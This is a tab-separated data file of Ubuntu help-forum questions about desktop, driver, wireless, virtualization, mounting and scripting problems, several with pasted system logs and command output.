163519	reset gdm to default display manager	i 'm currently running xubuntu 10.04 lts and wanted to try out the slim display manager on my system . well i installed it ( from the synaptic package manager ) and something really bad happened ; i ca n't even get to the display manage anymore to log in . when i boot up normally , it shows the xubuntu logo , then shows this one underscore in the top-left corner of my screen . i tried pressing `` alt+ctrl+f1 '' to launch a virtual terminal but that did n't work . i also tried to boot into recovery mode via grub . when i got to the recovery screen , if i were to press any of the arrow keys , the screen would show the xubuntu logo . if i press the arrow key again , it would go back to the recovery screen , but it would n't move down an option . it is n't too bad if i 'll need to re-install xubuntu ( i backed up all my important data a day ago ) , but it would be a real pain in the but if i had to . any help is appreciated . thanks ! edit : i forgot to mention that maybe resetting gdm to the default wm might fix it , but you see , i ca n't even log in to try to edit the `` /etc/x11/default-display-manager '' file . edit2 ; i decided just to bite the bullet and re-install/update xubuntu . thanks for the help though .
163521	is there any possible way to recover jpg images from a specific period of time ?	yesterday , during data transmission to an external hard drive , all data has been lost due to unexpected hdd crash . i 've tried to use photorec for a specific partition , it retrieved over 50 000 images , nevertheless , most of the obtained files are older than 3-5 months . in advance , thank you for your help . : )
163527	how to open files from other machine running ubuntu	i tried to take data from my pc to laptop . both are using ubuntu 11.10 os . i googled and tried to connect both the systems . now it is showing connected symbol . dont know how to proceed further . i need to take data from my pc using this lan connection . please provide me solution for this ...
163532	how can i restrict changing of root password to root users only ?	some users of my client are frequently changing root ( administrative ) password of ubuntu . my client is administrative user of that system . how to prevent other users to change administrative password ?
163536	memory being eaten up	i had this problem occasionally already under 10.4 , but since i 've recently updated to 12.4 something is constantly eating up my memory . right after the start i got 1.5 gb free and in less then 3 minutes it 's all gone . any ideas , because my system is not usable this way .
163537	how can i install ubuntu onto a external hdd ?	i have got an external hard drive and want to install ubuntu onto it . how can i do this ? the external hdd is a 'western digital my passport' it says that it needs to be formatted for a linux installation .
163541	how does a python dbus session service know the user is logging out ?	say you have a dbus service on the session bus ( the per-user bus ) . your service might get started via an /etc/xdg/autostart/* file , or it might get started the first time some app tries to use your well-known service name . either way , let 's say that the dbus session bus is the process that starts your service . and then the user logs out . so what happens ? does dbus send any actionable sig < foo > signals to your service , or is it strait to sigkill ? is there any other way to know the user is logging out ? basically , i have some cleanup actions i need to run , which includes killing sub-processes started with subprocess.popen and multiprocessing . now you before you say , `` popen and multiprocessing are evil , do n't use them '' , in my current experiment , i 'm not using them . i 'm just trying to figure out how a python dbus service can hook into something that allows it to run cleanup actions , whatever the overall architecture might be . any advice ? any examples ? note that my example will be running in a gobject.mainloop and is using python3 on ubuntu precise ( or quantal ) .
163546	icons from unity launcher and app switcher disappeared after update	i updated my 12.04 64b ubuntu and after restart , all icons from unity launcher and app switcher ( the alt+tab window ) are missing , check the screenshot . i tried to restart os but no change . any ideas how to get them back ? : ) thanks screenshot : update : reported as a bug # 1024768
163549	how to run a script on each login or once a day if not run that day already ?	i 've made a custom directory where i 've put a couple of my favourite wallpapers . i made a script which examines this directory , counts the number of pngs , and then randomly sets one image as a wallpaper . it looks like this : # ! /bin/bash # number of images in wallpaper folder cd $ home/favourite\ wallpapers/ numimages=`ls *.png | wc -l` # randomly chose one number randomnum= $ [ ( $ random % $ numimages ) + 1 ] # command to set wallpaper gsettings set org.gnome.desktop.background picture-uri file : // $ home/favourite\ wallpapers/00 $ randomnum.png now , how can i make this script runs on each login ( this is very easy thou ) or once a day if not has been already run on login ? the problem is that i often suspend my ubuntu and then awake it tomorrow morning , so in this case i never log in again . setting this script as startup job would not help me as , obviously , when awaken from suspend , i never re-log in . i can not simply set it via cron job as well because in cases when i do log in , the wallpaper would be changed two times a day . ps . anyone feel free to use this script with cron ( just set your own path and filename template or wait for a solution like mine : )
163550	virtualbox install 12.04 guest : `` pae not present ''	i get this message while trying to install ubuntu 12.04 as a guest in virutalbox 4.1.18 , on an ubuntu 10.04 host . this kernel requires the following feature not present on the cpu : pae some host specs : the host 's kernel is : linux 2.6.32-41-generic-pae gnu/linux lscpu ( host ) : architecture : i686 , cpu op-mode ( s ) : 32-bit , 64-bit grep -- color=always -i pae /proc/cpuinfo does show pae in its output . the 12.04 iso used is : ubuntu-12.04.0-desktop-i386.iso as a comparison/check , i downloaded and installed linux mint 13 cinnamon to the same host on the exact same vm ( i just changed the .iso image ) . it worked fine . its iso is : linuxmint-13-cinnamon-dvd-32bit.iso it seems ( to me ) that i have pae.. what is going on here ? update : i had assumed that linux mint also required pae ( being ubuntu based ) , but i 've just run ; grep -- color=always -i pae /proc/cpuinfo in the mint vm . it showed no output . so it seems the issue may lie with virtualbox . if that is the case , how can i get virtualbox into pae mode ?
163554	is it possible reduce swap memory size ?	the matter is that my computer has 3gb of memory ram . therefore i think that i do n't need too much swap memory size , and i really need free space in the hard disk . sorry by my english
163562	sharing ipv6 from sixxs to local kvm guests	i have a couple of tunnels and a subnet from sixxs . one tunnel is for my laptop , the other is for my desktop . on my desktop , i run kvm and have a few guests that i really would like to have ipv6 access . what is the easiest way to do this ?
163567	start program from terminal	i start a program from terminal with the following command : < program name > & but when i close the terminal the program will close too . how to escape the program closing ?
163579	run shell script on every new shell	i want to run a shell script ( define some environment variables ) at the start of every new shell ( globally , not for several users ) . so i placed my script into the directory /etc/profile.d/ , but that works only for login shells . is there a better place for my script ?
163583	ubuntu 64bit black screen on minecraft	i have tried posting on the forums , but i really need help ( i 'm a server admin and really do n't want to have to switch to windows just to run minecraft ) . anyhow , i originally was running openjdk6 as i was told that 7 was unstable and was getting periodical lag spikes while walking ( at least once every 3 seconds the screen would freeze for a tenth of a second ) . after that , i attempted to install sun 's java jdk7 ( i could n't get ahold of 6 without signing up for oracle 's newsletters ) . upon attempting to run minecraft , i got a black screen after logging in with this error message : 27 achievements 182 recipes setting user : thunder7102 , -1618112820878091307 exception in thread `` minecraft main thread '' java.lang.unsatisfiedlinkerror : /home/noiro/.minecraft/bin/natives/liblwjgl.so : /home/noiro/.minecraft/bin/natives/liblwjgl.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1825 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at org.lwjgl.sys $ 1.run ( sys.java:69 ) at java.security.accesscontroller.doprivileged ( native method ) at org.lwjgl.sys.doloadlibrary ( sys.java:65 ) at org.lwjgl.sys.loadlibrary ( sys.java:81 ) at org.lwjgl.sys. < clinit > ( sys.java:98 ) at org.lwjgl.opengl.display. < clinit > ( display.java:132 ) at net.minecraft.client.minecraft.a ( sourcefile:184 ) at net.minecraft.client.minecraft.run ( sourcefile:657 ) at java.lang.thread.run ( thread.java:722 ) now , this got me fed up , so i tried to install a windows 7 virtual machine through virtualbox , i gave it 256mb of graphics memory with 2d and 3d acceleration and 3gb of ram . i installed java jdk7 for windows ( which does work from experience on my other windows 7 partition ) . once again , a black screen after login . what the heck is going on guys ? my system specs : ubuntu 12.04 64bit fully updated running gnome3 nvidia gts 450 1.3gb oc'd amd athlon ii 4x 2.8ghz 6gb of ram so , what do you think ?
163589	can not create file/directory in home directory	i have a headless ubuntu 12.10 server . i 'm logged in as administrator via ssh . i can not create a directory in my home directory : administrator @ leo : ~ $ cd ~ administrator @ leo : ~ $ mkdir test mkdir : can not create directory `test ' : permission denied the equivalent as root does work : administrator @ leo : ~ $ sudo mkdir test administrator @ leo : ~ $ ls -al total 12 dr-x -- -- -- 3 administrator administrator 4096 jul 14 21:14 . drwxr-xr-x 6 root root 4096 oct 26 2011 .. lrwxrwxrwx 1 administrator administrator 56 sep 11 2011 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop lrwxrwxrwx 1 administrator administrator 39 sep 11 2011 .ecryptfs - > /home/.ecryptfs/administrator/.ecryptfs lrwxrwxrwx 1 administrator administrator 38 sep 11 2011 .private - > /home/.ecryptfs/administrator/.private lrwxrwxrwx 1 administrator administrator 52 sep 11 2011 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt drwxr-xr-x 2 root root 4096 jul 14 21:14 test i am unsure where the ecryptfs-related stuff comes from . i do n't believe i requested encryption of my home directory , but perhaps that is causing things to go awry ? can anyone explain what 's gone wrong here and/or provide a solution ?
163593	not getting wireless icon , not even wifi visible , wireless button is on	i am using compaq presario v 3000 tu laptop . today i have installed 12.04 ubuntu . but very sad i was not able to connect through wifi . for me it 's useless without wifi . tried lot of command posted on net but unable to rectify the problem -- - while running runtil wlan manager i am getting this error -- *critical error : ca n't find any wireless network interface . code : -3* plz help .. following is output of command run by me on my system .. ifconfig -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eth0 link encap : ethernet hwaddr 00:16 : d3:9b:11:52 inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :216 : d3ff : fe9b:1152/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4345 errors:0 dropped:0 overruns:0 frame:0 tx packets:3896 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4648555 ( 4.6 mb ) tx bytes:552728 ( 552.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:380 errors:0 dropped:0 overruns:0 frame:0 tx packets:380 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:33143 ( 33.1 kb ) tx bytes:33143 ( 33.1 kb ) lspci -- -- -- -- -- -- -- -- -- -- -- -- 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 08:08.0 ethernet controller : intel corporation pro/100 ve network connection ( rev 02 ) 08:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 08:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 08:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 08:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) rfkill list all -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no dmesg -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - [ 0.000000 ] mtrr variable ranges enabled : [ 0.000000 ] 0 base 000000000 mask fe0000000 write-back [ 0.000000 ] 1 base 01f700000 mask ffff00000 uncachable [ 0.000000 ] 2 base 01f800000 mask fff800000 uncachable [ 0.000000 ] 3 disabled [ 0.000000 ] 4 disabled [ 0.000000 ] 5 disabled [ 0.000000 ] 6 disabled [ 0.000000 ] 7 disabled [ 0.000000 ] pat not supported by cpu . [ 0.000000 ] original variable mtrrs [ 0.000000 ] reg 0 , base : 0gb , range : 512mb , type wb [ 0.000000 ] reg 1 , base : 503mb , range : 1mb , type uc [ 0.000000 ] reg 2 , base : 504mb , range : 8mb , type uc [ 0.000000 ] total ram covered : 503m [ 0.000000 ] found optimal setting for mtrr clean up [ 0.000000 ] gran_size : 64k chunk_size : 16m num_reg : 3 lose cover ram : 0g [ 0.000000 ] new variable mtrrs [ 0.000000 ] reg 0 , base : 0gb , range : 512mb , type wb [ 0.000000 ] reg 1 , base : 503mb , range : 1mb , type uc [ 0.000000 ] reg 2 , base : 504mb , range : 8mb , type uc [ 0.000000 ] found smp mp-table at [ c00f67e0 ] f67e0 [ 0.000000 ] initial memory mapped : 0 - 02000000 [ 0.000000 ] base memory trampoline at [ c009b000 ] 9b000 size 16384 [ 0.000000 ] init_memory_mapping : 0000000000000000-000000001f680000 [ 0.000000 ] 0000000000 - 0000200000 page 4k [ 0.000000 ] 0000200000 - 001f600000 page 2m [ 0.000000 ] 001f600000 - 001f680000 page 4k [ 0.000000 ] kernel direct mapping tables up to 1f680000 @ 1ffb000-2000000 [ 0.000000 ] ramdisk : 1d9e9000 - 1e766000 [ 0.000000 ] acpi : rsdp 000f66f0 00024 ( v03 hp ) [ 0.000000 ] acpi : xsdt 1f684f0f 00084 ( v01 hpqoem slic-mpc 06040000 ltp 00000000 ) [ 0.000000 ] acpi : facp 1f68dc38 000f4 ( v03 intel calistga 06040000 alan 00000001 ) [ 0.000000 ] acpi : dsdt 1f6864cc 076f8 ( v01 hpqoem slic-mpc 06040000 msft 03000000 ) [ 0.000000 ] acpi : facs 1f68efc0 00040 [ 0.000000 ] acpi : apic 1f68dd2c 00068 ( v01 hpqoem slic-mpc 06040000 lohr 00000064 ) [ 0.000000 ] acpi : hpet 1f68dd94 00038 ( v01 hpqoem slic-mpc 06040000 lohr 00000064 )
163598	how do i install wireless drivers for ralink rt5370 offline ?	little problem i want to transfer from my windows to ubuntu because its amazing but my wireless usb isnt picked up on ubuntu so its completely offline and i dont know how to download or transfer the driver for it over to ubuntu the computer calls the wireless 802.11n wireless lan card although on the ralink website that doesnt come up but i think its a rt5370 which i can download on my windows computer but i cant transfer it over to ubuntu via memory stick etc so yeah any help would be appreciated kind of dont want to be forever doomed in windows : d
163601	i installed windows 7 after ubuntu , how do i get the grub menu back ?	i want to install windows7 on my system with pre-installed ubuntu 11.10 to play some games in my relax time . but after installing windows7 over ubuntu my computer does n't show os chooser ( grub ) in the beginning of system startup . now i 've lost my ubuntu installation disk but i still have its .iso file . i ca n't , or do n't want , to burn it to a cd/dvd ? is there any way that i can use that .iso image to repair system startup without need to burn that cd again ?
163602	how can i stop kde apps from being shown in the software centre ?	their size is so big , that 's why i will never download any of them so they 're just been in my way to find the native software that am willing to download from ubuntu software center , so is there is anyway to delete their ppa or whatever ?
163604	how can i control the volume of the line-in input + normal output at the same time ?	i have a sound source connected via line-in to my computer . but when i change the master volume , only the volume of sounds being played on the computer ( e.g . media , alerts , etc . ) changes ; the output volume of the line-in source does not change . how do i control that ? update : to clarify , i do n't just want to control the line-in output volume , i want to control the normal `` output volume '' from one control only , and i want that to affect also the line in output volume . something like a `` master volume '' that would affect everything that comes out of the sound card output . the `` master volume '' i see when running the command `` alsamixer '' only affects the sound that comes from the main pc , not from the line in .
163611	problem forwarding usb device to virtual box	i want to connect a can to usb interface for programming an engine control unit to a winxp virtual machine . only this device is not listed in under the small usb icon at the lower left of the vm window . running usb-devices i get the following info : t : bus=06 lev=01 prnt=01 port=00 cnt=01 dev # = 3 spd=12 mxch= 0 d : ver= 1.10 cls=ff ( vend . ) sub=ff prot=00 mxps=16 # cfgs= 1 p : vendor=0000 prodid=0102 rev=01.00 c : # ifs= 1 cfg # = 1 atr=80 mxpwr=100ma i : if # = 0 alt= 0 # eps= 4 cls=00 ( > ifc ) sub=00 prot=00 driver= ( none ) my vm works with all other usb devices ( including some unusual ones ) . the device thats not working on my system is working fine with virtualbox on a mac and a bsd host my colleges laptops . i am running ubuntu 12.04 and virtualbox 4.1.18 thanks in advance this would really make my work a lot easier , not having to boot win all the time : - ( additional info : this is what happens when i plug in the device in question : udevadm monitor monitor will print the received events for : udev - the event which udev sends out after rule processing kernel - the kernel uevent kernel [ 13416.745162 ] remove /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) kernel [ 13416.745212 ] remove /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) kernel [ 13416.745236 ] remove /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) kernel [ 13416.745265 ] remove /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) kernel [ 13416.745287 ] remove /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) kernel [ 13416.745309 ] remove /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) kernel [ 13416.745330 ] remove /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) kernel [ 13416.745352 ] remove /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) udev [ 13416.745782 ] remove /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) udev [ 13416.747609 ] remove /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) udev [ 13416.747653 ] remove /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) udev [ 13416.747680 ] remove /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) udev [ 13416.747705 ] remove /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) udev [ 13416.748618 ] remove /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) udev [ 13416.748830 ] remove /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) udev [ 13416.749363 ] remove /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) kernel [ 13416.750026 ] add /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) kernel [ 13416.750062 ] add /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) kernel [ 13416.750086 ] add /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) kernel [ 13416.750115 ] add /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) udev [ 13416.751381 ] add /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) udev [ 13416.751417 ] add /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) udev [ 13416.751443 ] add /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) udev [ 13416.751898 ] add /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) kernel [ 13416.753027 ] add /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) kernel [ 13416.753050 ] add /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) kernel [ 13416.753064 ] add /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) kernel [ 13416.753077 ] add /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) kernel [ 13416.753091 ] remove /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) kernel [ 13416.753105 ] remove /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) kernel [ 13416.753118 ] remove /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) kernel [ 13416.753132 ] remove /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) kernel [ 13416.753145 ] remove /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) kernel [ 13416.753158 ] remove /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) kernel [ 13416.753171 ] remove /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) kernel [ 13416.753184 ] remove /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) kernel [ 13416.755131 ] add /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) udev [ 13416.755158 ] remove /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) kernel [ 13416.755174 ] add /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) udev [ 13416.755189 ] add /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) kernel [ 13416.755203 ] add /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) udev [ 13416.755218 ] remove /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) kernel [ 13416.755231 ] add /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) udev [ 13416.755245 ] add /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) udev [ 13416.755260 ] add /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) udev [ 13416.755275 ] add /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) udev [ 13416.755289 ] remove /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) udev [ 13416.755303 ] remove /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) kernel [ 13416.755622 ] add /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) kernel [ 13416.755643 ] add /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) kernel [ 13416.755656 ] add /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) kernel [ 13416.755670 ] add /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) udev [ 13416.759319 ] add /devices/system/cpu/cpu0/cpuidle/state2 ( cpu ) udev [ 13416.759348 ] add /devices/system/cpu/cpu0/cpuidle/state3 ( cpu ) udev [ 13416.759364 ] remove /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) udev [ 13416.759379 ] remove /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) udev [ 13416.759394 ] add /devices/system/cpu/cpu1/cpuidle/state1 ( cpu ) udev [ 13416.759409 ] add /devices/system/cpu/cpu1/cpuidle/state0 ( cpu ) udev [ 13416.759424 ] remove /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) udev [ 13416.759439 ] add /devices/system/cpu/cpu1/cpuidle/state3 ( cpu ) udev [ 13416.759453 ] remove /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) udev [ 13416.759468 ] add /devices/system/cpu/cpu1/cpuidle/state2 ( cpu ) udev [ 13416.759482 ] add /devices/system/cpu/cpu0/cpuidle/state1 ( cpu ) udev [ 13416.759496 ] add /devices/system/cpu/cpu0/cpuidle/state0 ( cpu ) kernel [ 13417.205442 ] add /devices/pci0000:00/0000:00:1d.0/usb6/6-1 ( usb ) kernel [ 13417.208418 ] add /devices/pci0000:00/0000:00:1d.0/usb6/6-1/6-1:1.0 ( usb ) udev [ 13417.227113 ] add /devices/pci0000:00/0000:00:1d.0/usb6/6-1 ( usb ) udev [ 13417.229757 ] add /devices/pci0000:00/0000:00:1d.0/usb6/6-1/6-1:1.0 ( usb ) and this is what happens if i plug in the vector device that is forwarded correctly : udevadm monitor monitor will print the received events for : udev - the event which udev sends out after rule processing kernel - the kernel uevent kernel [ 13696.085406 ] add /devices/pci0000:00/0000:00:1d.7/usb2/2-2 ( usb ) kernel [ 13696.465828 ] add /devices/pci0000:00/0000:00:1d.7/usb2/2-2/2-2:1.0 ( usb ) udev [ 13696.484915 ] add /devices/pci0000:00/0000:00:1d.7/usb2/2-2 ( usb ) udev [ 13696.492091 ] add /devices/pci0000:00/0000:00:1d.7/usb2/2-2/2-2:1.0 ( usb ) output from lsusb : lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 17ef:1004 lenovo integrated webcam bus 004 device 002 : id 08ff:2810 authentec , inc. aes2810 bus 004 device 003 : id 0a5c:2145 broadcom corp. bluetooth with enhanced data rate ii bus 006 device 007 : id 0000:0102 bus 002 device 011 : id 1248:1001 tail -f /var/log/kern.log including connecting and diconnecting the device : tp @ tp-thinkpad-r500 : ~ $ tail -f /var/log/kern.log jul 15 10:46:53 tp-thinkpad-r500 kernel : [ 15135.583561 ] iwlwifi 0000:03:00.0 : radio type=0x1-0x2-0x0 jul 15 10:46:53 tp-thinkpad-r500 kernel : [ 15135.632544 ] addrconf ( netdev_up ) : wlan0 : link is not ready jul 15 10:46:53 tp-thinkpad-r500 kernel : [ 15135.633620 ] tg3 0000:04:00.0 : irq 49 for msi/msi-x jul 15 10:46:53 tp-thinkpad-r500 kernel : [ 15135.662314 ] addrconf ( netdev_up ) : eth0 : link is not ready jul 15 10:46:55 tp-thinkpad-r500 kernel : [ 15137.314088 ] tg3 0000:04:00.0 : eth0 : link is up at 100 mbps , full duplex jul 15 10:46:55 tp-thinkpad-r500 kernel : [ 15137.314093 ] tg3 0000:04:00.0 : eth0 : flow control is on for tx and on for rx jul 15 10:46:55 tp-thinkpad-r500 kernel : [ 15137.315407 ] addrconf ( netdev_change ) : eth0 : link becomes ready jul 15 10:46:56 tp-thinkpad-r500 kernel : [ 15138.477486 ] input : logitech bluetooth mouse m555b as /devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.0/bluetooth/hci0/hci0:11/input14 jul 15 10:46:56 tp-thinkpad-r500 kernel : [ 15138.477699 ] generic-bluetooth 0005:046d : b009.0002 : input , hidraw0 : bluetooth hid v4.16 mouse [ logitech bluetooth mouse m555b ] on 00:24:2c : bf:81:72 jul 15 10:47:05 tp-thinkpad-r500 kernel : [ 15148.080037 ] eth0 : no ipv6 routers present jul 15 10:52:03 tp-thinkpad-r500 kernel : [ 15445.116070 ] usb 6-1 : new full-speed usb device number 8 using uhci_hcd jul 15 10:52:16 tp-thinkpad-r500 kernel : [ 15458.488118 ] usb 6-1 : usb disconnect , device number 8
163614	xubuntu 12.04 sony vgn-fj170 brightness/volume/s1/s2 keys are not functional	i just installed xubuntu on an old test laptop ( as in topic ) . none of the 'extra ' function key works . fn+f2/f3/f4 = volume control ( fail ) , fn+f5/f6 = brightness control ( fail ) , and s1 and s2 fail to register . the intel gpu is the gma900 ( i915 ) please advice ... looking for solution . lsmod | grep i915 i915 414620 3 drm_kms_helper 45466 1 i915 drm 197692 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19068 1 i915 lsmod | grep sony sony_laptop 39681 0 if anyone need more info , please let me know just checked -- /lib/udev/keymaps/module-sony the keymaps is correct for this fj170 keyboard .
163621	how to install tomcat 6 from a zip ?	i have extracted the zip package in my home folder and i want to access webapps folder through localhost:8080 , which files i have to change in order to get this done ? i have installed java-6-sun , paths java_home and classpath are set . edit : i work on ubuntu 12.04 .
163628	how to mount external hdd with fat32 owner rights	when my external hdd mounts , it get mounted with root as owner . so i can only look read files . how do i get this to mount as me as owner ? it 's frustrating . why is it really necessary to have root as the owner . ca n't you just have a admin account that get that privilege ? as i have read , there are no way to set fat32/ntfs with owner . so there are no way i can change this . atleast not that i am aware of . i hope anyone one here can help me . update : it 's labeled as vfat , not fat32 . not sure if that is the same thing . update 2 : the screenshot show my language , but i do believe you know what it means . i will add mount shortly . mount gives the output vfat ( rw )
163631	how to show a window of an already active app when trying to open a new instance of that app	i know the question is a bit vague . i 'll try to explain better below : my app ( python/gtk ) is mostly an indicator . using this indicator you can choose to show/hide the main window . when i try to open a new instance of the app i made it so it would check if the app is already running . if so , it would abort trying to run the app . now i want to adjust it , so before aborting i want it to bring the already active app 's main window to the foreground . even if this window is n't opened at the moment . so i believe my question is : how can i get a ( global ? ) variable/instance of my already active app from my new app ? ( so i can bring my main window to the foreground ) edit : i just found this method in the api : gtkwindow - set_startup_id ( ) . this says : normally , startup identifier is managed automatically and you should only use this function in special cases like transferring focus from other processes . so this means it should be possible to bring focus to a window from another process . but how would i get this id ? and how would i use this id to bring it to the foreground ?
163634	nas storage not auto-mounting on-load	i 'm using a goflex home storage device from seagate . now that i 've figured out how to auto-mount my nas storage by editing fstab . i 'm having another issue . sudo mount -a on a started system mounts the drives as i would expect . however , at startup , the auto-mounting procedure fails . a review of dmesg suggests that the process fails because the network is not available . is there a way to create and run a shell script at startup that would run the mount command as root ? ( after startup , sudo mount -a works like a charm ) thoughts ?
163637	triple monitor ubuntu 12.04	i have just installed my first ever ubuntu ! the first major problem is that my second graphics card is not registering . i have 2 x radeon hd 6800 's connected with a crossfire attatchment . the triple monitors work fine in windows 7 , but not ubuntu . i have followed tutorials to install amd drivers and still no luck . any ideas ? thank you .
163640	why is n't google chrome available in the software centre ?	google chrome is available for ubuntu on the google website but why is it not present in ubuntu software centre ?
163642	why does my laptop only show a cursor after closing and then opening the screen ?	when i close my laptop screen and open it , the screen stays black , but i can see the cursor . i can switch to the other ttys using ctrl+alt+f1-f6 , so computer is n't l0cked out or unresponsive , the gui just does n't show anythimg other than the cursor . does any one know the problem could be ? edit : log/command output http : //dl.dropbox.com/u/35887513/dmesg.out http : //dl.dropbox.com/u/35887513/var-log-kern-log http : //dl.dropbox.com/u/35887513/var-log-syslog http : //dl.dropbox.com/u/35887513/xorg-0-log
